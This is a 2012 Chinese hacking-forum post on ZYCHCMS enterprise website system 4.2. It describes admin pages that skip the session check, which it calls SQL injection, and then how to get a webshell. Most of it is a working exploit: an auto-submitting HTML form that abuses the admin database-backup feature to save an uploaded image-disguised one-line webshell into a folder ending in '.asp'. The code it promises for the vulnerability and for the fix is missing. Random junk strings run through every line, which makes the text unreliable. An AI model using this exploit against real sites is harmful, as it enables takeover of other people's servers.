找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1742|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

. n* L. I0 V+ r
0 x0 p! W* I& G0 G  x8 ~5 ^$ R' j4 a
/ d7 D8 H2 I# U+ i3 l( |
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)- \$ ?  @) j. k1 S
①SQL注射漏洞( O' q) M$ E' o) y
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp( T3 G  B3 z/ L! Z' C( m; B
漏洞原因:未过滤, A( e# q  q9 \4 z5 Y+ A
漏洞代码:
4 h( F/ `* X" g1 n1 K 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
4 W- d3 H) k2 J0 A! L8 b 修复方法:在文件开头加入代码
- @% l1 {+ [/ z ' w7 f- E- v$ u& ]5 O( }5 E

/ {- [9 C( D7 p8 |# w1 g②后台拿WBSHELL: Q, K- Z+ k# V$ C& O; E5 n1 e# i$ f
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。1 t" C9 W  \& ]+ M0 A
这里在网上找了一个,改了下,将就着用。
' ?% [2 p" a$ `% R7 k% s( z 以下是代码本地提交代码
- e/ p& [+ T* y, Y4 J 6 s% K0 d2 h) d* e
6 |  G" N6 z/ T5 L' N
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
& S& v5 k, f  I5 _6 g3 A <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
; @9 f9 F4 Y- h/ b <tr>
7 d5 G; ~' l* f5 I  ] <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
: y+ z, o* X- `) w3 r- ~ </tr>7 _' T2 e4 o2 y/ `* ]
<tr>
8 B  V! A! e- I3 W: D. ?* C& | <td bgcolor=”#FFFFFF”><span class=”back_southidc”>3 z% V" l) m$ k
</span>/ {2 G( y8 X3 n9 v! `. |
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
- t7 \( \1 F$ r+ ]$ n <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >" |2 |; i" j6 d- R  z4 F$ }
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>1 h( O+ ]- h! X6 ?# U
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d4 p9 v' a0 g2 |- ?3 p' x+ N: ^
<div align=”left”>1 e, l8 U$ {# M. ^& u/ z* D
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />. h" g1 G0 I! o0 s# k; N" M
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
7 p! P8 Q0 O; I5 ]0 _, U2 m3 V: O <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />& I& g8 ~, L3 o1 [. d9 z4 V$ y: ^' F
</div></td>8 L5 H9 V# S3 @
</tr>
& Y) E6 S) V* f' _: Q <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
6 Y# j  W0 i( a6 h8 P <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
$ W, F3 J' d* t. S$ e. m" [ <td class=”td”><div align=”left”># I4 |. F) ?' k& N3 I
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />$ v3 t0 v1 j# ^+ X& d: S5 q
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>6 L7 Q8 r# b. ]! N* }8 }
</tr>0 w- [4 J$ R6 ]" u0 _3 G2 v6 T4 p
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
4 [+ D. h# w" C1 i( |9 q <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>9 v/ i( x3 \5 N3 b7 n& X. N( r. f8 p
<td class=”td”><div align=”left”>
" V$ R+ v5 o! L, t <input type=”submit” value=”确定备份” class=”btn”
! j( s: e9 `  w- t5 g </div></td>
3 e$ J/ R1 d3 {2 z </tr>
. w# w- m9 G' J9 w: S  }4 s( a1 k </table></td></tr></form>
$ V! d, |: q. }- T8 F1 L) G </table>' M% J, z) M9 d2 f1 q2 r0 u
</td>* W! i5 `7 e' `
</tr>" B9 ~4 a- R) i) t: n2 I  ^, M' D
</table>- u( z4 ^2 M  e* E* y& X6 g
<script>
2 R7 K  I3 h  @1 y! @ document.all.add.submit();
- ^7 T( m: F& d) N- A1 X2 U6 d6 _ </script>
7 a! k! D7 d2 l2 r" s- | # C5 j; J: y5 u$ b* w5 n4 V

8 @5 d% {  F" P3 {
+ u/ e2 m& l- J6 {  D9 J$ z7 C! E

  G  O3 R1 ]/ Z; Z8 G, [' U% W# [; z! w% j
9 u8 F6 }+ T  q* }
; q0 X; x0 r, W7 h7 ^. _  F' h0 o9 D
, ^  ~& ^. z+ m3 H4 {

9 l+ r% }5 m$ K5 K& ^! U6 X( E, x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表